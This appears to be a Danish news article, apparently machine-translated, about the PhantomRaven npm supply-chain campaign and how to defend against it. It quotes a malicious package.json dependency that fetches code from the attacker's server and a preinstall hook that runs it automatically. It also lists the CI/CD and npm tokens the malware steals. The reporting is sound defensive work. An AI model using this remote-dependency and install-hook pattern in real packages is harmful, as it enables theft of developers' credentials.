Den igangværende PhantomRaven npm forsyningskædeangreb er en sofistikeret malwarekampagne, der er rettet mod udviklere over hele verden. Siden august 2025 har angrebet spredt sig 126 ondsindede npm-pakker som tilsammen er blevet downloadet mere end 86.000 gange. Målet er at stjæle npm-godkendelsestokens, GitHub-loginoplysninger og CI/CD-hemmeligheder, mens man bruger avancerede teknikker til detektionsunddragelse til at omgå de fleste sikkerhedsværktøjer.

Analytiker hos Koi-sikkerhed identificerede kampagnen i oktober 2025, da deres adfærdsovervågningssystem, Wings, markerede mistænkelig netværksaktivitet under pakkeinstallationer. Alle ondsindede pakker foretog eksterne anmodninger til det samme domæne, hvilket afslørede en koordineret og global Operation.

Sådan fungerer PhantomRaven npm forsyningskædeangreb

Koi-forskernes undersøgelse afslørede en klar tidslinje. De første 21 pakker blev opdaget og fjernet i august 2025. Kort efter tilpassede angriberne deres strategi og formåede at offentliggøre yderligere 80 pakker mellem september og oktober, der fuldstændigt omgik standarddetektionsmekanismer. Angriberens infrastruktur viser en kontrast mellem teknologisk avanceret udførelse og overraskende skødesløs driftssikkerhed.

Reklame

For at skjule den ondsindede kode brugte angriberne en teknik med eksterne dynamiske afhængigheder. Det tillader, at afhængigheder defineres via HTTP-URL'er i stedet for via npm-registreringsdatabasen, for eksempel:
“ui-styles-pkg”: “http://packages.storeartifact.com/ui-styles-pkg.tgz”.
Når en sådan pakke installeres, henter npm automatisk den eksterne afhængighed uden nogen sikkerhedsvalidering eller gennemsigtighed.

Det betyder, at den kode, der uploades til npmjs.com kan se helt harmløse ud – ofte bare et "hej verden"-script – mens den faktiske skadelige nyttelast hentes dynamisk fra angriberens server ved installation. På denne måde omgår PhantomRaven-angribere både statisk kodeanalyse og afhængighedsscanning.

Skjulte afhængigheder og automatisk udførelse

Når den usynlige afhængighed ankommer til offerets system, aktiveres den ondsindede kode øjeblikkeligt via npm's livscyklusscript. Den manipulerede pakke.jsonFilen indeholder et præinstallationsscript, "preinstall": "node index.js", som automatisk udføres uden brugerens viden. Det er ligegyldigt hvor dybt i afhængighedstræet pakken er placeret – enhver installation af en tilsyneladende legitim pakke kan udløse den ondsindede udførelse.

De PhantomRaven npm forsyningskædeangreb og udnytter dermed npm's iboende fleksibilitet til at levere ondsindet kode i realtid. Da hver installation henter afhængigheden på ny fra angriberens server, kan nyttelasten også tilpasses målmiljøet, hvilket gør angrebet meget vanskeligt at udføre. opdage og stoppe.

Hvad angriberne indsamler

Efter en vellykket installation indsamler PhantomRaven systematisk e-mailadresser fra miljøvariabler, gitconfigfiler, npmrc-konfigurationer og forfatterfelter i pakke.json. Den udvinder også CI/CD-legitimationsoplysninger, herunder GitHub-handlingstokens, GitLab CI-nøgler, Jenkins-login, CircleCI-tokens og npm-publiceringstokens.

Malwaren udfører derefter en fuld systemprofilering: offentlige IP-adresser, værtsnavne, operativsystemer, Node.js-versioner og netværkskonfigurationer indsamles for at skelne mellem virksomhedsnetværk og individuelle udviklermaskiner. Disse oplysninger bruges til at identificere værdifulde mål, hvor angribere kan få større adgang eller sprede sig.

Operationel uagtsomhed og sporing

Trods den tekniske kunnen viser infrastrukturen sig tegn på operationel forsømmelse. Adskillige e-mailkonti blev oprettet sekventielt via gratis tjenester – fra jpdtester01@hotmail.com til jpdtester13@gmail.com – og brugernavn som npmhell og npmpackagejpd gentages i flere pakker. Denne uoverensstemmelse har gjort det muligt for forskere at spore kampagnen til en enkelt aktør, hvilket giver håb om fremtidig identifikation og retsforfølgelse.

Anbefalede beskyttelsesforanstaltninger

1. Roter alle tokens og API-nøgler (GitHub, npm, CI/CD), der muligvis er blevet eksponeret.
2. Udsigt pakke.jsonfiler og identificer eventuelle afhængigheder, der refererer til HTTP-URL'er. Bloker eller fjern dem.
3. Implementer SBOM-værktøjer som f.eks. CycloneDX eller SPDX for at få fuldt overblik over afhængigheder og versionshistorik.
4. Begræns token-tilladelser, brug kortlivede hemmeligheder, og aktiver automatisk rotation.
5. Introducer adfærdsovervågning i CI/CD-miljøer, såsom sandbox-analyse af nye pakker, før de implementeres.
6. Følge OWASP-softwarekomponentverifikationsstandard til sikker håndtering af tredjepartsafhængigheder.
7. Overvej at bruge private npm-registre og validere afhængigheder før publicering for at reducere risikoen til manipulation i åbne økosystemer.

Analyse og betydning for branchen

Det voksende omfang af angreb, der PhantomRaven npm forsyningskædeangreb viser tydeligt, hvordan afhængighedskæden er blevet en af softwarens største sårbarheder. Efterhånden som virksomheder bygger videre open source og tusindvis Tredjepartspakker øger risikoen for, at en enkelt kompromitteret komponent vil have enorme konsekvenser.

For IT-organisationer betyder det, at sikkerhed ikke længere kun handler om netværk eller slutbrugere – det handler om hele udviklingskæden. Sikker kodehåndtering, pålidelige afhængigheder og løbende analyse af forsyningskæden bliver et strategisk problem snarere end en teknisk detalje.

Kampagnen viser også, at angribere er begyndt at tænke som udviklere: de udnytter eksisterende funktioner i værktøjer som npm til at sprede malware på en måde, der ser fuldstændig legitim ud. Dette kræver en ændring i, hvordan virksomheder overvåger og verificerer deres software.

For svenske og nordiske virksomheder understreger arrangementet vigtigheden af at opbygge ekspertise inden for sikkerhed i softwareforsyningskæden og at overholde internationale standarder. Gennem proaktiv kontrol, delt information og åbenhed samarbejder, kan branchen være bedre forberedt på det næste store angreb.